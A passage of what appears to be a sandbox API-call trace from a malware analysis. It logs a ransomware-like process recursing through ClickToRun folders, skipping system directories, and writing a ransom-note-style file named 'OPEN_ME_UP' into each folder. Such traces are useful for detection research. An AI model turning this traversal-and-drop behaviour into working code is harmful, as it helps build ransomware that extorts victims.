out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 91 [0069.242] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0069.242] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0069.243] CloseHandle (hObject=0x434) returned 1 [0069.243] GetProcessHeap () returned 0xbe0000 [0069.243] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0069.243] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85eb08ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85eb08ee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85eb08ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1 [0069.243] lstrcmpiW (lpString1="Integration", lpString2="Windows") returned -1 [0069.243] lstrcmpiW (lpString1="Integration", lpString2="$Recycle.bin") returned 1 [0069.243] lstrcmpiW (lpString1="Integration", lpString2="System Volume Information") returned -1 [0069.243] lstrcmpiW (lpString1="Integration", lpString2="Program Files") returned -1 [0069.243] lstrcmpiW (lpString1="Integration", lpString2="Program Files (x86)") returned -1 [0069.243] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration") returned 63 [0069.243] lstrcmpW (lpString1="Integration", lpString2=".") returned 1 [0069.243] lstrcmpW (lpString1="Integration", lpString2="..") returned 1 [0069.243] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0069.243] GetProcessHeap () returned 0xbe0000 [0069.243] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0069.243] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*") returned 65 [0069.243] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85eb08ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85eb08ee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85eb08ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19c60 [0069.243] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0069.244] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0069.244] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0069.244] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0069.244] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0069.244] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\.") returned 65 [0069.244] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.244] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85eb08ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85eb08ee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85eb08ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0069.244] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0069.244] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0069.244] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0069.244] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0069.244] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0069.244] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\..") returned 66 [0069.244] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.244] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.244] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85eb08ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85eb08ee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85eb08ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 1 [0069.244] lstrcmpiW (lpString1="ShortcutBackups", lpString2="Windows") returned -1 [0069.244] lstrcmpiW (lpString1="ShortcutBackups", lpString2="$Recycle.bin") returned 1 [0069.244] lstrcmpiW (lpString1="ShortcutBackups", lpString2="System Volume Information") returned -1 [0069.244] lstrcmpiW (lpString1="ShortcutBackups", lpString2="Program Files") returned 1 [0069.244] lstrcmpiW (lpString1="ShortcutBackups", lpString2="Program Files (x86)") returned 1 [0069.244] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned 79 [0069.244] lstrcmpW (lpString1="ShortcutBackups", lpString2=".") returned 1 [0069.244] lstrcmpW (lpString1="ShortcutBackups", lpString2="..") returned 1 [0069.244] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0069.244] GetProcessHeap () returned 0xbe0000 [0069.244] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc36140 [0069.244] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*") returned 81 [0069.244] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85eb08ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85eb08ee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85eb08ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a360 [0069.244] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0069.244] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0069.245] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0069.245] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0069.245] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0069.245] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\.") returned 81 [0069.245] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.245] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85eb08ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85eb08ee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85eb08ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0069.245] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0069.245] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0069.245] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0069.245] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0069.245] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0069.245] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\..") returned 82 [0069.245] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.245] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.245] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85eb08ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85eb08ee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85eb08ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0069.245] FindClose (in: hFindFile=0xc1a360 | out: hFindFile=0xc1a360) returned 1 [0069.245] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 111 [0069.245] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0069.246] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0069.247] CloseHandle (hObject=0x438) returned 1 [0069.247] GetProcessHeap () returned 0xbe0000 [0069.247] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc36140 | out: hHeap=0xbe0000) returned 1 [0069.247] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85eb08ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85eb08ee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85eb08ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 0 [0069.247] FindClose (in: hFindFile=0xc19c60 | out: hFindFile=0xc19c60) returned 1 [0069.247] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 95 [0069.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\integration\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0069.247] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0069.248] CloseHandle (hObject=0x434) returned 1 [0069.248] GetProcessHeap () returned 0xbe0000 [0069.248] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0069.248] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85eb08ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85eb08ee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85eb08ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 0 [0069.248] FindClose (in: hFindFile=0xc1a120 | out: hFindFile=0xc1a120) returned 1 [0069.248] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 83 [0069.248] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0069.249] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0069.250] CloseHandle (hObject=0x430) returned 1 [0069.250] GetProcessHeap () returned 0xbe0000 [0069.250] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0069.250] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8826bb5f, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x683c4eba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x683c4eba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ProductReleases", cAlternateFileName="PRODUC~1")) returned 1 [0069.250] lstrcmpiW (lpString1="ProductReleases", lpString2="Windows") returned -1 [0069.250] lstrcmpiW (lpString1="ProductReleases", lpString2="$Recycle.bin") returned 1 [0069.250] lstrcmpiW (lpString1="ProductReleases", lpString2="System Volume Information") returned -1 [0069.250] lstrcmpiW (lpString1="ProductReleases", lpString2="Program Files") returned -1 [0069.250] lstrcmpiW (lpString1="ProductReleases", lpString2="Program Files (x86)") returned -1 [0069.250] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases") returned 55 [0069.250] lstrcmpW (lpString1="ProductReleases", lpString2=".") returned 1 [0069.250] lstrcmpW (lpString1="ProductReleases", lpString2="..") returned 1 [0069.250] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0069.250] GetProcessHeap () returned 0xbe0000 [0069.250] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0069.250] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\*") returned 57 [0069.250] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8826bb5f, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x683c4eba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x683c4eba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19fe0 [0069.311] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0069.312] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0069.312] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0069.312] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0069.312] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0069.312] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\.") returned 57 [0069.312] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.312] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8826bb5f, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x683c4eba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x683c4eba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0069.312] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0069.312] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0069.312] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0069.312] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0069.312] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0069.312] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\..") returned 58 [0069.312] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.312] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.312] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19bad881, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a320d06, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a320d06, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="5A65C4D7-3CDF-4BE4-8560-F036D300C13F", cAlternateFileName="5A65C4~1")) returned 1 [0069.312] lstrcmpiW (lpString1="5A65C4D7-3CDF-4BE4-8560-F036D300C13F", lpString2="Windows") returned -1 [0069.312] lstrcmpiW (lpString1="5A65C4D7-3CDF-4BE4-8560-F036D300C13F", lpString2="$Recycle.bin") returned 1 [0069.312] lstrcmpiW (lpString1="5A65C4D7-3CDF-4BE4-8560-F036D300C13F", lpString2="System Volume Information") returned -1 [0069.312] lstrcmpiW (lpString1="5A65C4D7-3CDF-4BE4-8560-F036D300C13F", lpString2="Program Files") returned -1 [0069.312] lstrcmpiW (lpString1="5A65C4D7-3CDF-4BE4-8560-F036D300C13F", lpString2="Program Files (x86)") returned -1 [0069.312] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F") returned 92 [0069.312] lstrcmpW (lpString1="5A65C4D7-3CDF-4BE4-8560-F036D300C13F", lpString2=".") returned 1 [0069.312] lstrcmpW (lpString1="5A65C4D7-3CDF-4BE4-8560-F036D300C13F", lpString2="..") returned 1 [0069.312] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0069.312] GetProcessHeap () returned 0xbe0000 [0069.312] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0069.312] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\*") returned 94 [0069.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19bad881, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a320d06, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a320d06, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a360 [0069.313] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0069.313] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0069.313] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0069.313] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0069.313] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0069.313] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\.") returned 94 [0069.313] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.313] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19bad881, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a320d06, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a320d06, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0069.313] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0069.313] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0069.313] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0069.313] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0069.313] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0069.313] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\..") returned 95 [0069.313] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.313] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a320d06, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a49e573, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a49e573, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-us.16", cAlternateFileName="")) returned 1 [0069.313] lstrcmpiW (lpString1="en-us.16", lpString2="Windows") returned -1 [0069.313] lstrcmpiW (lpString1="en-us.16", lpString2="$Recycle.bin") returned 1 [0069.313] lstrcmpiW (lpString1="en-us.16", lpString2="System Volume Information") returned -1 [0069.313] lstrcmpiW (lpString1="en-us.16", lpString2="Program Files") returned -1 [0069.313] lstrcmpiW (lpString1="en-us.16", lpString2="Program Files (x86)") returned -1 [0069.313] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16") returned 101 [0069.313] lstrcmpW (lpString1="en-us.16", lpString2=".") returned 1 [0069.313] lstrcmpW (lpString1="en-us.16", lpString2="..") returned 1 [0069.313] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0069.313] GetProcessHeap () returned 0xbe0000 [0069.313] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc36140 [0069.313] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\*") returned 103 [0069.313] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\en-us.16\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a320d06, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a49e573, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a49e573, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e60 [0069.315] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0069.315] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0069.315] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0069.315] lstrcmpiW (lpString1=".", lpString2="Program Files") 